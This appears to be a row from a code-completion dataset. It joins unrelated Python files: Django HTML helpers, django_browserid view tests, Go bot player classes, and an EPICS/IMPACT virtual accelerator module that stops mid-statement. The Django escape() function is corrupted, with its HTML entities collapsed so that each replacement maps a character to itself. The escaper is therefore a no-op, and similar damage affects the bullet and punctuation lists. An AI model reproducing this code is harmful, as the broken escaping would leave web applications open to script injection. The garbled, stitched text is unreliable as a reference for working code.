gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
"""HTML utilities suitable for global use."""
from __future__ import unicode_literals
import re
import string
try:
from urllib.parse import quote, urlsplit, urlunsplit
except ImportError: # Python 2
from urllib import quote
from urlparse import urlsplit, urlunsplit
from django.utils.safestring import SafeData, mark_safe
from django.utils.encoding import smart_str, force_unicode
from django.utils.functional import allow_lazy
from django.utils import six
from django.utils.text import normalize_newlines
# Configuration for urlize() function.
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)']
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('<', '>')]
# List of possible strings used for bullets in bulleted lists.
DOTS = ['·', '*', '\u2022', '•', '•', '•']
unencoded_ampersands_re = re.compile(r'&(?!(\w+|#\d+);)')
unquoted_percents_re = re.compile(r'%(?![0-9A-Fa-f]{2})')
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\w', re.IGNORECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
simple_email_re = re.compile(r'^\S+@\S+\.\S+$')
link_target_attribute_re = re.compile(r'(<a [^>]*?)target=[^\s>]+')
html_gunk_re = re.compile(r'(?:<br clear="all">|<i><\/i>|<b><\/b>|<em><\/em>|<strong><\/strong>|<\/?smallcaps>|<\/?uppercase>)', re.IGNORECASE)
hard_coded_bullets_re = re.compile(r'((?:<p>(?:%s).*?[a-zA-Z].*?</p>\s*)+)' % '|'.join([re.escape(x) for x in DOTS]), re.DOTALL)
trailing_empty_content_re = re.compile(r'(?:<p>(?: |\s|<br \/>)*?</p>\s*)+\Z')
def escape(text):
"""
Returns the given text with ampersands, quotes and angle brackets encoded for use in HTML.
"""
return mark_safe(force_unicode(text).replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", '''))
escape = allow_lazy(escape, six.text_type)
_base_js_escapes = (
('\\', '\\u005C'),
('\'', '\\u0027'),
('"', '\\u0022'),
('>', '\\u003E'),
('<', '\\u003C'),
('&', '\\u0026'),
('=', '\\u003D'),
('-', '\\u002D'),
(';', '\\u003B'),
('\u2028', '\\u2028'),
('\u2029', '\\u2029')
)
# Escape every ASCII character with a value less than 32.
_js_escapes = (_base_js_escapes +
tuple([('%c' % z, '\\u%04X' % z) for z in range(32)]))
def escapejs(value):
"""Hex encodes characters for use in JavaScript strings."""
for bad, good in _js_escapes:
value = mark_safe(force_unicode(value).replace(bad, good))
return value
escapejs = allow_lazy(escapejs, six.text_type)
def conditional_escape(text):
"""
Similar to escape(), except that it doesn't operate on pre-escaped strings.
"""
if isinstance(text, SafeData):
return text
else:
return escape(text)
def format_html(format_string, *args, **kwargs):
"""
Similar to str.format, but passes all arguments through conditional_escape,
and calls 'mark_safe' on the result. This function should be used instead
of str.format or % interpolation to build up small HTML fragments.
"""
args_safe = map(conditional_escape, args)
kwargs_safe = dict([(k, conditional_escape(v)) for (k, v) in
kwargs.iteritems()])
return mark_safe(format_string.format(*args_safe, **kwargs_safe))
def format_html_join(sep, format_string, args_generator):
"""
A wrapper format_html, for the common case of a group of arguments that need
to be formatted using the same format string, and then joined using
'sep'. 'sep' is also passed through conditional_escape.
'args_generator' should be an iterator that returns the sequence of 'args'
that will be passed to format_html.
Example:
format_html_join('\n', "<li>{0} {1}</li>", ((u.first_name, u.last_name)
for u in users))
"""
return mark_safe(conditional_escape(sep).join(
format_html(format_string, *tuple(args))
for args in args_generator))
def linebreaks(value, autoescape=False):
"""Converts newlines into <p> and <br />s."""
value = normalize_newlines(value)
paras = re.split('\n{2,}', value)
if autoescape:
paras = ['<p>%s</p>' % escape(p).replace('\n', '<br />') for p in paras]
else:
paras = ['<p>%s</p>' % p.replace('\n', '<br />') for p in paras]
return '\n\n'.join(paras)
linebreaks = allow_lazy(linebreaks, six.text_type)
def strip_tags(value):
"""Returns the given HTML with all tags stripped."""
return re.sub(r'<[^>]*?>', '', force_unicode(value))
strip_tags = allow_lazy(strip_tags)
def strip_spaces_between_tags(value):
"""Returns the given HTML with spaces between tags removed."""
return re.sub(r'>\s+<', '><', force_unicode(value))
strip_spaces_between_tags = allow_lazy(strip_spaces_between_tags, six.text_type)
def strip_entities(value):
"""Returns the given HTML with all entities (&something;) stripped."""
return re.sub(r'&(?:\w+|#\d+);', '', force_unicode(value))
strip_entities = allow_lazy(strip_entities, six.text_type)
def fix_ampersands(value):
"""Returns the given HTML with all unencoded ampersands encoded correctly."""
return unencoded_ampersands_re.sub('&', force_unicode(value))
fix_ampersands = allow_lazy(fix_ampersands, six.text_type)
def smart_urlquote(url):
"Quotes a URL if it isn't already quoted."
# Handle IDN before quoting.
scheme, netloc, path, query, fragment = urlsplit(url)
try:
netloc = netloc.encode('idna') # IDN -> ACE
except UnicodeError: # invalid domain part
pass
else:
url = urlunsplit((scheme, netloc, path, query, fragment))
# An URL is considered unquoted if it contains no % characters or
# contains a % not followed by two hexadecimal digits. See #9655.
if '%' not in url or unquoted_percents_re.search(url):
# See http://bugs.python.org/issue2637
url = quote(smart_str(url), safe=b'!*\'();:@&=+$,/?#[]~')
return force_unicode(url)
def urlize(text, trim_url_limit=None, nofollow=False, autoescape=False):
"""
Converts any URLs in text into clickable links.
Works on http://, https://, www. links, and also on links ending in one of
the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
Links can have trailing punctuation (periods, commas, close-parens) and
leading punctuation (opening parens) and it'll still do the right thing.
If trim_url_limit is not None, the URLs in link text longer than this limit
will truncated to trim_url_limit-3 characters and appended with an elipsis.
If nofollow is True, the URLs in link text will get a rel="nofollow"
attribute.
If autoescape is True, the link text and URLs will get autoescaped.
"""
trim_url = lambda x, limit=trim_url_limit: limit is not None and (len(x) > limit and ('%s...' % x[:max(0, limit - 3)])) or x
safe_input = isinstance(text, SafeData)
words = word_split_re.split(force_unicode(text))
for i, word in enumerate(words):
match = None
if '.' in word or '@' in word or ':' in word:
# Deal with punctuation.
lead, middle, trail = '', word, ''
for punctuation in TRAILING_PUNCTUATION:
if middle.endswith(punctuation):
middle = middle[:-len(punctuation)]
trail = punctuation + trail
for opening, closing in WRAPPING_PUNCTUATION:
if middle.startswith(opening):
middle = middle[len(opening):]
lead = lead + opening
# Keep parentheses at the end only if they're balanced.
if (middle.endswith(closing)
and middle.count(closing) == middle.count(opening) + 1):
middle = middle[:-len(closing)]
trail = closing + trail
# Make URL we want to point to.
url = None
nofollow_attr = ' rel="nofollow"' if nofollow else ''
if simple_url_re.match(middle):
url = smart_urlquote(middle)
elif simple_url_2_re.match(middle):
url = smart_urlquote('http://%s' % middle)
elif not ':' in middle and simple_email_re.match(middle):
local, domain = middle.rsplit('@', 1)
try:
domain = domain.encode('idna')
except UnicodeError:
continue
url = 'mailto:%s@%s' % (local, domain)
nofollow_attr = ''
# Make link.
if url:
trimmed = trim_url(middle)
if autoescape and not safe_input:
lead, trail = escape(lead), escape(trail)
url, trimmed = escape(url), escape(trimmed)
middle = '<a href="%s"%s>%s</a>' % (url, nofollow_attr, trimmed)
words[i] = mark_safe('%s%s%s' % (lead, middle, trail))
else:
if safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
elif safe_input:
words[i] = mark_safe(word)
elif autoescape:
words[i] = escape(word)
return ''.join(words)
urlize = allow_lazy(urlize, six.text_type)
def clean_html(text):
"""
Clean the given HTML. Specifically, do the following:
* Convert <b> and <i> to <strong> and <em>.
* Encode all ampersands correctly.
* Remove all "target" attributes from <a> tags.
* Remove extraneous HTML, such as presentational tags that open and
immediately close and <br clear="all">.
* Convert hard-coded bullets into HTML unordered lists.
* Remove stuff like "<p> </p>", but only if it's at the
bottom of the text.
"""
from django.utils.text import normalize_newlines
text = normalize_newlines(force_unicode(text))
text = re.sub(r'<(/?)\s*b\s*>', '<\\1strong>', text)
text = re.sub(r'<(/?)\s*i\s*>', '<\\1em>', text)
text = fix_ampersands(text)
# Remove all target="" attributes from <a> tags.
text = link_target_attribute_re.sub('\\1', text)
# Trim stupid HTML such as <br clear="all">.
text = html_gunk_re.sub('', text)
# Convert hard-coded bullets into HTML unordered lists.
def replace_p_tags(match):
s = match.group().replace('</p>', '</li>')
for d in DOTS:
s = s.replace('<p>%s' % d, '<li>')
return '<ul>\n%s\n</ul>' % s
text = hard_coded_bullets_re.sub(replace_p_tags, text)
# Remove stuff like "<p> </p>", but only if it's at the bottom
# of the text.
text = trailing_empty_content_re.sub('', text)
return text
clean_html = allow_lazy(clean_html, six.text_type)
| |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.contrib import auth
from django.test.client import RequestFactory
from django.utils import six
from django.utils.functional import lazy
from mock import Mock, patch, PropertyMock
from nose.tools import eq_, ok_
from django_browserid import BrowserIDException, views
from django_browserid.tests import mock_browserid, TestCase
class JSONViewTests(TestCase):
def test_http_method_not_allowed(self):
class TestView(views.JSONView):
def get(self, request, *args, **kwargs):
return 'asdf'
response = TestView().http_method_not_allowed()
eq_(response.status_code, 405)
ok_(set(['GET']).issubset(set(response['Allow'].split(', '))))
self.assert_json_equals(response.content, {'error': 'Method not allowed.'})
def test_http_method_not_allowed_allowed_methods(self):
class GetPostView(views.JSONView):
def get(self, request, *args, **kwargs):
return 'asdf'
def post(self, request, *args, **kwargs):
return 'qwer'
response = GetPostView().http_method_not_allowed()
ok_(set(['GET', 'POST']).issubset(set(response['Allow'].split(', '))))
class GetPostPutDeleteHeadView(views.JSONView):
def get(self, request, *args, **kwargs):
return 'asdf'
def post(self, request, *args, **kwargs):
return 'qwer'
def put(self, request, *args, **kwargs):
return 'qwer'
def delete(self, request, *args, **kwargs):
return 'qwer'
def head(self, request, *args, **kwargs):
return 'qwer'
response = GetPostPutDeleteHeadView().http_method_not_allowed()
expected_methods = set(['GET', 'POST', 'PUT', 'DELETE', 'HEAD'])
actual_methods = set(response['Allow'].split(', '))
ok_(expected_methods.issubset(actual_methods))
class GetNextTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
def test_no_param(self):
"""If next isn't in the POST params, return None."""
request = self.factory.post('/')
eq_(views._get_next(request), None)
def test_is_safe(self):
"""Return the value of next if it is considered safe."""
request = self.factory.post('/', {'next': '/asdf'})
request.get_host = lambda: 'myhost'
with patch.object(views, 'is_safe_url', return_value=True) as is_safe_url:
eq_(views._get_next(request), '/asdf')
is_safe_url.assert_called_with('/asdf', host='myhost')
def test_isnt_safe(self):
"""If next isn't safe, return None."""
request = self.factory.post('/', {'next': '/asdf'})
request.get_host = lambda: 'myhost'
with patch.object(views, 'is_safe_url', return_value=False) as is_safe_url:
eq_(views._get_next(request), None)
is_safe_url.assert_called_with('/asdf', host='myhost')
class VerifyTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
def verify(self, request_type, **kwargs):
"""
Call the verify view function. Kwargs are passed as GET or POST
arguments.
"""
if request_type == 'get':
request = self.factory.get('/browserid/verify', kwargs)
else:
request = self.factory.post('/browserid/verify', kwargs)
verify_view = views.Verify.as_view()
with patch.object(auth, 'login'):
response = verify_view(request)
return response
def test_no_assertion(self):
"""If no assertion is given, return a failure result."""
with self.settings(LOGIN_REDIRECT_URL_FAILURE='/fail'):
response = self.verify('post', blah='asdf')
eq_(response.status_code, 403)
self.assert_json_equals(response.content, {'redirect': '/fail'})
@mock_browserid(None)
def test_auth_fail(self):
"""If authentication fails, redirect to the failure URL."""
with self.settings(LOGIN_REDIRECT_URL_FAILURE='/fail'):
response = self.verify('post', assertion='asdf')
eq_(response.status_code, 403)
self.assert_json_equals(response.content, {'redirect': '/fail'})
@mock_browserid('test@example.com')
def test_auth_success_redirect_success(self):
"""If authentication succeeds, redirect to the success URL."""
user = auth.models.User.objects.create_user('asdf', 'test@example.com')
request = self.factory.post('/browserid/verify', {'assertion': 'asdf'})
with self.settings(LOGIN_REDIRECT_URL='/success'):
with patch('django_browserid.views.auth.login') as login:
verify = views.Verify.as_view()
response = verify(request)
login.assert_called_with(request, user)
eq_(response.status_code, 200)
self.assert_json_equals(response.content,
{'email': 'test@example.com', 'redirect': '/success'})
def test_sanity_checks(self):
"""Run sanity checks on all incoming requests."""
with patch('django_browserid.views.sanity_checks') as sanity_checks:
self.verify('post')
ok_(sanity_checks.called)
@patch('django_browserid.views.auth.login')
def test_login_success_no_next(self, *args):
"""
If _get_next returns None, use success_url for the redirect
parameter.
"""
view = views.Verify()
view.request = self.factory.post('/')
view.user = Mock(email='a@b.com')
with patch('django_browserid.views._get_next', return_value=None) as _get_next:
with patch.object(views.Verify, 'success_url', '/?asdf'):
response = view.login_success()
self.assert_json_equals(response.content, {'email': 'a@b.com', 'redirect': '/?asdf'})
_get_next.assert_called_with(view.request)
@patch('django_browserid.views.auth.login')
def test_login_success_next(self, *args):
"""
If _get_next returns a URL, use it for the redirect parameter.
"""
view = views.Verify()
view.request = self.factory.post('/')
view.user = Mock(email='a@b.com')
with patch('django_browserid.views._get_next', return_value='/?qwer') as _get_next:
with patch.object(views.Verify, 'success_url', '/?asdf'):
response = view.login_success()
self.assert_json_equals(response.content, {'email': 'a@b.com', 'redirect': '/?qwer'})
_get_next.assert_called_with(view.request)
class LogoutTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
_get_next_patch = patch('django_browserid.views._get_next')
self._get_next = _get_next_patch.start()
self.addCleanup(_get_next_patch.stop)
def test_redirect(self):
"""Include LOGOUT_REDIRECT_URL in the response."""
request = self.factory.post('/')
logout = views.Logout.as_view()
self._get_next.return_value = None
with patch.object(views.Logout, 'redirect_url', '/test/foo'):
with patch('django_browserid.views.auth.logout') as auth_logout:
response = logout(request)
auth_logout.assert_called_with(request)
eq_(response.status_code, 200)
self.assert_json_equals(response.content, {'redirect': '/test/foo'})
def test_redirect_next(self):
"""
If _get_next returns a URL, use it for the redirect parameter.
"""
request = self.factory.post('/')
logout = views.Logout.as_view()
self._get_next.return_value = '/test/bar'
with patch.object(views.Logout, 'redirect_url', '/test/foo'):
with patch('django_browserid.views.auth.logout'):
response = logout(request)
self.assert_json_equals(response.content, {'redirect': '/test/bar'})
class CsrfTokenTests(TestCase):
def setUp(self):
self.factory = RequestFactory()
self.view = views.CsrfToken()
def test_lazy_token_called(self):
"""
If the csrf_token variable in the RequestContext is a lazy
callable, make sure it is called during the view.
"""
global _lazy_csrf_token_called
_lazy_csrf_token_called = False
# I'd love to use a Mock here instead, but lazy doesn't behave
# well with Mocks for some reason.
def _lazy_csrf_token():
global _lazy_csrf_token_called
_lazy_csrf_token_called = True
return 'asdf'
csrf_token = lazy(_lazy_csrf_token, six.text_type)()
request = self.factory.get('/browserid/csrf/')
with patch('django_browserid.views.RequestContext') as RequestContext:
RequestContext.return_value = {'csrf_token': csrf_token}
response = self.view.get(request)
eq_(response.status_code, 200)
eq_(response.content, b'asdf')
ok_(_lazy_csrf_token_called)
def test_never_cache(self):
request = self.factory.get('/browserid/csrf/')
response = self.view.get(request)
eq_(response['Cache-Control'], 'max-age=0')
| |
from __future__ import print_function
import logging
import numpy as np
import tempfile
import copy
import gomill
from gomill import common, boards, sgf, sgf_moves, gtp_states
import utils
import analyze_board
"""
Basic Player / Bot objects;
Player should be gomill compatible envelope which actually generates
moves, resigns, ..
Bot should be the object that actually does the core work, e.g. computing
Move probability, ..
"""
class Player(object):
def __init__(self):
self.handlers = { 'name' : self.handle_name,
'quit' : self.handle_quit }
self.name = None
def genmove(self, game_state, player):
"""
game_state is gomill.gtp_states.Game_state
:returns: gomill.Move_generator_result
"""
raise NotImplementedError
def handle_name(self, args):
if self.name is None:
return self.__class__.__name__
return self.name
def handle_quit(self, args):
pass
def get_handlers(self):
return self.handlers
def __str__(self):
return "<%s>"%self.handle_name([])
class DistWrappingMaxPlayer(Player):
"""
A simple wrapping bot which chooses next move to be the one with the biggest (therefore the name)
probability. The probabilities are computed by the wrapped bot's gen_probdist().
"""
def __init__(self, bot):
super(DistWrappingMaxPlayer, self).__init__()
self.bot = bot
self.handlers['ex-dist'] = self.handle_ex_dist
self.handlers['move_probabilities'] = self.handle_move_probabilities
self.move_num = 0
def genmove(self, game_state, player):
self.move_num += 1
dist = self.bot.gen_probdist(game_state, player)
result = gtp_states.Move_generator_result()
if dist is not None:
move = np.unravel_index(np.argmax(dist), dist.shape)
result.move = move
logging.debug("%s valid moves\n%s"%(self,
utils.dist_stats(dist)))
logging.debug("%s move %d: playing %s"%(self,
self.move_num,
gomill.common.format_vertex(move)))
else:
result.pass_move = True
logging.debug("%s move %d: playing pass"%(self, self.move_num))
return result
def handle_quit(self, args):
self.bot.close()
def handle_move_probabilities(self, args):
return self.bot.move_probabilities()
def handle_ex_dist(self, args):
top = 3
if args:
try:
top = gomill.gtp_engine.interpret_int(args[0])
except IndexError:
gtp_engine.report_bad_arguments()
return self.bot.dist_stats(top)
class DistWrappingSamplingPlayer(Player):
"""
A simple wrapping bot which randomly samples next move based on the moves' probability
distribution, computed by the wrapped bot's gen_probdist().
Never passes.
"""
def __init__(self, bot):
super(DistWrappingSamplingPlayer, self).__init__()
self.bot = bot
def genmove(self, game_state, player):
dist = self.bot.gen_probdist(game_state, player)
result = gtp_states.Move_generator_result()
if dist is not None:
# choose an intersection with probability given by the dist
coord = np.random.choice((game_state.board.side ** 2), 1, p=dist.ravel())[0]
move = (coord / game_state.board.side, coord % game_state.board.side)
result.move = move
else:
result.pass_move = True
return result
def handle_quit(self, args):
self.bot.close()
class RandomPlayer(Player):
def genmove(self, game_state, player):
result = gtp_states.Move_generator_result()
# pass
if game_state.move_history and not game_state.move_history[-1].move:
result.pass_move = True
return result
else:
for i in xrange(10):
row, col = np.random.choice(game_state.board.side, 2)
## TODO this might be incorrect move
# but nobody will use the RandomPlayer anyway
if not game_state.board.get(row, col):
result.move = (row, col)
return result
result.resign = True
return result
class WrappingGnuGoPlayer(Player):
def __init__(self, player, passing=True, resigning=False):
super(WrappingGnuGoPlayer, self).__init__()
self.player = player
self.passing = passing
self.resigning = resigning
hp = copy.copy(player.get_handlers())
hp.update(self.handlers)
self.handlers = hp
def genmove(self, game_state, color):
result = gtp_states.Move_generator_result()
logging.debug("%s enter"%(self))
move = self.gnu_go_move(game_state, color)
# pass if GnuGo tells us to do so
if self.passing and move == 'pass':
result.pass_move = True
return result
elif self.resigning and move == 'resign':
result.resign = True
return result
else:
logging.debug("%s not listening, descend"%(self))
return self.player.genmove(game_state, color)
def gnu_go_move(self, game_state, color):
assert isinstance(game_state.board, gomill.boards.Board) # for wingide code completion
game = gomill.sgf.Sgf_game(size=game_state.board.side)
gomill.sgf_moves.set_initial_position(game, game_state.board)
node = game.get_root()
node.set('KM', game_state.komi)
node.set('PL', color)
with tempfile.NamedTemporaryFile() as sgf_file:
sgf_file.write(game.serialise())
sgf_file.flush()
gg_move = utils.get_gnu_go_response(sgf_file.name, color)
return gg_move.lower()
class DistributionBot(object):
def __init__(self):
self.last_dist = None
self.last_player = None
def __str__(self):
return "<%s>"%(self.__class__.__name__)
def gen_probdist_raw(self, game_state, player):
"""
The core method to implement for distribution bots.
It needs not
:return: a numpy array of floats of shape (board.side, board.side), or None for pass
the array should be normalized to 1
"""
raise NotImplementedError
def gen_probdist(self, game_state, player):
"""
Generates a correct move probability distribution for the next move,
using the gen_probdist_raw().
Correct means that it zeroes out probability of playing incorrect move,
such as move forbidden by ko, suicide and occupied points.
Stores the dist and the player.
:return: a numpy array of floats of shape (board.side, board.side), or None for pass
the array is normalized to 1
"""
dist = self.gen_probdist_raw(game_state, player)
if dist is not None:
correct_moves = analyze_board.board2correct_move_mask(game_state.board, player)
if game_state.ko_point:
correct_moves[game_state.ko_point[0]][game_state.ko_point[1]] = 0
# compute some debugging stats of the incorrect moves first
incorrect_dist = (1 - correct_moves) * dist
logging.debug("%s incorrect moves\n%s"%(self,
utils.dist_stats(incorrect_dist)))
# keep only correct moves
dist = correct_moves * dist
s = dist.sum()
if s > 0.0:
dist = dist / dist.sum()
else:
logging.debug("No valid moves, PASSING.")
dist = None
self.last_dist = dist
self.last_player = player
return self.last_dist
def move_probabilities(self):
if self.last_dist is not None:
ret = []
for row, col in np.transpose(np.nonzero(self.last_dist)):
ret.append( "%s %f"%(gomill.common.format_vertex((row, col)),
self.last_dist[row][col]))
return '\n'.join(ret)
return ''
def dist_stats(self, top=3):
if self.last_dist is not None:
return utils.dist_stats(self.last_dist, top)
return ''
def close(self):
"""Called upon exit, to allow for resource freeup."""
pass
class RandomDistBot(DistributionBot):
def gen_probdist_raw(self, game_state, player):
return np.random.random((game_state.board.side, game_state.board.side))
if __name__ == "__main__":
def test_bot():
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=logging.DEBUG)
player = DistWrappingMaxPlayer(RandomDistBot())
class State:
pass
s = State()
b = gomill.boards.Board(3)
s.board = b
b.play(1, 1, "b")
b.play(0, 1, "b")
logging.debug("\n"+gomill.ascii_boards.render_board(b))
mv = player.genmove(s, 'w').move
b.play(mv[0], mv[1], 'w')
logging.debug("\n"+gomill.ascii_boards.render_board(b))
logging.debug("best move is " + gomill.common.format_vertex(mv))
logging.debug("\n" + str(player.bot.last_dist))
logging.debug(utils.dist_stats(player.bot.last_dist))
test_bot()
| |
# encoding: UTF-8
"""Library for running an EPICS-based virtual accelertor using IMPACT particle tracker."""
from __future__ import print_function
import cothread
import logging
import math
import numpy
import os.path
import random
import re
import shutil
import subprocess
import tempfile
import threading
import time
from collections import OrderedDict
from copy import deepcopy
from cothread import catools
from phantasy.library.lattice.impact import LatticeFactory, OUTPUT_MODE_DIAG
from phantasy.library.layout import BCMElement
from phantasy.library.layout import BLElement
from phantasy.library.layout import BLMElement
from phantasy.library.layout import BPMElement
from phantasy.library.layout import BendElement
from phantasy.library.layout import CavityElement
from phantasy.library.layout import CorElement
from phantasy.library.layout import DriftElement
from phantasy.library.layout import PMElement
from phantasy.library.layout import PortElement
from phantasy.library.layout import QuadElement
from phantasy.library.layout import SeqElement
from phantasy.library.layout import SextElement
from phantasy.library.layout import SolCorElement
from phantasy.library.layout import StripElement
from phantasy.library.layout import ValveElement
from phantasy.library.parser import Configuration
try:
basestring # Python 2.X
except NameError:
basestring = str # Python 3.X
__copyright__ = "Copyright (c) 2015, Facility for Rare Isotope Beams"
__author__ = "Dylan Maxwell"
# configuration options
CONFIG_MACHINE = "machine"
CONFIG_IMPACT_EXE_FILE = "impact_exe_file"
CONFIG_IMPACT_DATA_DIR = "impact_data_dir"
# default values
_DEFAULT_IMPACT_EXE = "impact"
_TEMP_DIRECTORY_SUFFIX = "_va_impact"
_DEFAULT_ERROR_VALUE = 0.0
_VA_STATUS_GOOD = "OK"
_VA_STATUS_BAD = "ERR"
# global logger instance
_LOGGER = logging.getLogger(__name__)
# global virtual accelerator
_VIRTUAL_ACCELERATOR = None
def start(layout, **kwargs):
"""Start the global virtual accelerator.
Parameters
----------
layout :
Accelerator layout object.
Keyword Arguments
-----------------
settings :
Dictionary of machine settings.
channels :
List of channel tuples with (name, properties, tags).
start :
Name of accelerator element to start simulation.
end :
Name of accelerator element to end simulation.
data_dir :
Path of directory containing IMPACT data files.
work_dir :
Path of directory for execution of IMPACT.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None:
_VIRTUAL_ACCELERATOR = build_virtaccel(layout, **kwargs)
if _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator already started")
_VIRTUAL_ACCELERATOR.start()
def stop():
"""Stop the global virtual accelerator.
"""
global _VIRTUAL_ACCELERATOR
if _VIRTUAL_ACCELERATOR is None or not _VIRTUAL_ACCELERATOR.is_started():
raise RuntimeError("Virtual Accelerator not started")
_VIRTUAL_ACCELERATOR.stop()
def build_virtaccel(layout, **kwargs):
"""Convenience method to build a virtual accelerator.
Parameters
----------
layout :
Accelerator layout object
Keyword Arguments
-----------------
settings :
Dictionary of machine settings
channels :
List of channel tuples with (name, properties, tags)
start :
Name of accelerator element to start simulation
end :
Name of accelerator element to end simulation
data_dir :
Path of directory containing IMPACT data files
work_dir :
Path of directory for execution of IMPACT
Returns
-------
ret :
VirtualAccelerator instance
"""
va_factory = VirtualAcceleratorFactory(layout, **kwargs)
return va_factory.build()
class VirtualAcceleratorFactory(object):
"""Prepare a VirtualAccelerator for execution.
The main purpose of this class is to process the accelerator
description and configure the VirtualAccelerator for proper
exection.
"""
def __init__(self, layout, **kwargs):
self.layout = layout
self.config = kwargs.get("config", None)
self.settings = kwargs.get("settings", None)
self.channels = kwargs.get("channels", None)
self.start = kwargs.get("start", None)
self.end = kwargs.get("end", None)
self.data_dir = kwargs.get("data_dir", None)
self.work_dir = kwargs.get("work_dir", None)
@property
def layout(self):
return self._layout
@layout.setter
def layout(self, layout):
if not isinstance(layout, SeqElement):
raise TypeError("VirtAccelFactory: 'layout' property much be type SeqElement")
self._layout = layout
@property
def start(self):
return self._start
@start.setter
def start(self, start):
if (start is not None) and not isinstance(start, basestring):
raise TypeError("VirtAccelFactory: 'start' property much be type string or None")
self._start = start
@property
def end(self):
return self._end
@end.setter
def end(self, end):
if (end is not None) and not isinstance(end, basestring):
raise TypeError("VirtAccelFactory: 'end' property much be type string or None")
self._end = end
@property
def config(self):
return self._config
@config.setter
def config(self, config):
if not isinstance(config, Configuration):
raise TypeError("LatticeFactory: 'config' property must be type Configuration")
self._config = config
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
if not isinstance(settings, dict):
raise TypeError("VirtAccelFactory: 'settings' property much be type dict")
self._settings = settings
@property
def channels(self):
return self._channels
@channels.setter
def channels(self, channels):
if not isinstance(channels, list):
raise TypeError("VirtAccelFactory: 'channels' property much be type list")
self._channels = channels
@property
def machine(self):
return self._machine
@machine.setter
def machine(self, machine):
if (machine is not None) and not isinstance(machine, basestring):
raise TypeError("VirtAccelFactory: 'machine' property much be type string or None")
self._machine = machine
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if (data_dir is not None) and not isinstance(data_dir, basestring):
raise TypeError("VirtAccelFactory: 'data_dir' property much be type string or None")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, basestring):
raise TypeError("VirtAccelFactory: 'work_dir' property much be type string or None")
self._work_dir = work_dir
def _get_config_impact_exe(self):
if self.config.has_default(CONFIG_IMPACT_EXE_FILE):
return self.config.getabspath_default(CONFIG_IMPACT_EXE_FILE, cmd=True)
return _DEFAULT_IMPACT_EXE
def _findChannel(self, name, field, handle):
for channel, props, _ in self.channels:
if props["elemName"] != name:
continue
if props["elemField"] != field:
continue
if props["elemHandle"] != handle:
continue
# IMPORTANT: Channel names originating from channel finder
# may be of type 'unicode' instead of 'str'. The cothread
# library does not have proper support for unicode strings.
return str(channel)
raise RuntimeError("VirtAccelFactory: channel not found: '{}', '{}', '{}'".format(name, field, handle))
def build(self):
"""Process the accelerator description and configure the Virtual Accelerator.
"""
settings = self.settings
data_dir = self.data_dir
if (data_dir is None) and self.config.has_default(CONFIG_IMPACT_DATA_DIR):
data_dir = self.config.getabspath_default(CONFIG_IMPACT_DATA_DIR)
if data_dir is None:
raise RuntimeError("VirtAccelFactory: No data directory provided, check the configuration")
work_dir = self.work_dir
impact_exe = self._get_config_impact_exe()
latfactory = LatticeFactory(self.layout, config=self.config, settings=self.settings)
latfactory.outputMode = OUTPUT_MODE_DIAG
latfactory.start = self.start
latfactory.end = self.end
m = re.match("(.*:)?(.*):(.*):(.*)", self.channels[0][0])
if not m:
raise RuntimeError("VirtAccelFactory: Error determining channel prefix, check channel names")
if m.group(1) is None:
chanprefix = None
else:
# IMPORTANT: chanprefix must
# be converted from unicode
chanprefix = str(m.group(1))
va = VirtualAccelerator(latfactory, settings, chanprefix, impact_exe, data_dir, work_dir)
for elem in self.layout.iter(start=self.start, end=self.end):
if isinstance(elem, CavityElement):
# Need to normalize cavity phase settings to 0~360
settings[elem.name][elem.fields.phase] = _normalize_phase(settings[elem.name][elem.fields.phase])
va.append_rw(self._findChannel(elem.name, elem.fields.phase, "setpoint"),
self._findChannel(elem.name, elem.fields.phase, "readset"),
self._findChannel(elem.name, elem.fields.phase, "readback"),
(elem.name, elem.fields.phase), desc="Cavity Phase", egu="degree", drvh=360, drvl=0)
va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, "setpoint"),
self._findChannel(elem.name, elem.fields.amplitude, "readset"),
self._findChannel(elem.name, elem.fields.amplitude, "readback"),
(elem.name, elem.fields.amplitude), desc="Cavity Amplitude", egu="%")
va.append_elem(elem)
elif isinstance(elem, SolCorElement):
va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
self._findChannel(elem.name, elem.fields.field, "readset"),
self._findChannel(elem.name, elem.fields.field, "readback"),
(elem.name, elem.fields.field), desc="Solenoid Field", egu="T") # , drvratio=0.10)
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
(elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
egu="radian") # , drvabs=0.001)
va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
(elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
egu="radian") # , drvabs=0.001)
va.append_elem(elem)
elif isinstance(elem, CorElement):
va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
